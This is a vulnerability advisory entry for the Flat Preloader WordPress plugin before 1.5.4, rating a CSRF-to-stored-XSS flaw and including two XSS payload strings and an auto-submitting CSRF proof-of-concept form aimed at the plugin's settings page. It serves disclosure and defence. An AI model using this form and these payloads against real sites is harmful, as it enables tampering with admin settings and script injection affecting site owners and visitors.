Lucene search

K
wpexploitApple502jWPEX-ID:972ECDE8-3D44-4DD9-81E3-643D8737434F
HistorySep 28, 2021 - 12:00 a.m.

Flat Preloader < 1.5.4 - CSRF to Stored Cross-Site Scripting

2021-09-2800:00:00
apple502j
279

5.4 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:N/I:P/A:N

The plugin does not enforce nonce checks when saving its settings, as well as does not sanitise and escape them, which could allow attackers to a make logged in admin change them with a Cross-Site Scripting payload (triggered either in the frontend or backend depending on the payload) The CSRF was fixed in 1.5.1, however further sanitisation was done in v1.5.2 to 1.5.4

Depending on the payload, the XSS will be triggered either in the frontend or backend:

Frontend: " onload=alert(/XSS/)//
Backend: " style=animation-name:rotation onanimationstart=alert(/XSS/)//

<form action="https://example.com/wp-admin/options-general.php?page=flat-preloader" method="post" id="csrf">
<input type="hidden" name="preloader-style" value="windows-10/circles-menu-1.gif">
<input type="hidden" name="preloader-display" value="all">
<input type="hidden" name="preloader[custom_image_url]" value="">
<input type="hidden" name="preloader[text_under_icon]" value="">
<input type="hidden" name="preloader[delay_time]" value="">
<input type="hidden" name="preloader[alt]" value='PAYLOAD'>
<input type="hidden" name="save-option" value="Save Changes">
</form>
<script>csrf.submit()</script>

5.4 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:N/I:P/A:N

Related for WPEX-ID:972ECDE8-3D44-4DD9-81E3-643D8737434F